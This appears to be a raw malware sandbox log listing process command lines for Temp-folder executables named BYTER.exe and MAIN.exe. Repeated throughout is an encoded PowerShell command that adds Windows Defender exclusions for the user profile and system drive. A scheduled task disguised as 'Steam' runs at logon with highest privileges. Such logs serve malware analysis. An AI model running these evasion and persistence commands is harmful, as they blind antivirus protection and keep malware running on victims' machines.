"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8057.tmp.bat""

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\timeout.exe

timeout 3

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "3209356941771363768-599244579-17035025121542075587-291538739524266970-2106023698"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Roaming\Steam.exe

"C:\Users\Admin\AppData\Roaming\Steam.exe"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1760597343-8288439651944488240-239102127-100156141810872266401751689826208226846"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

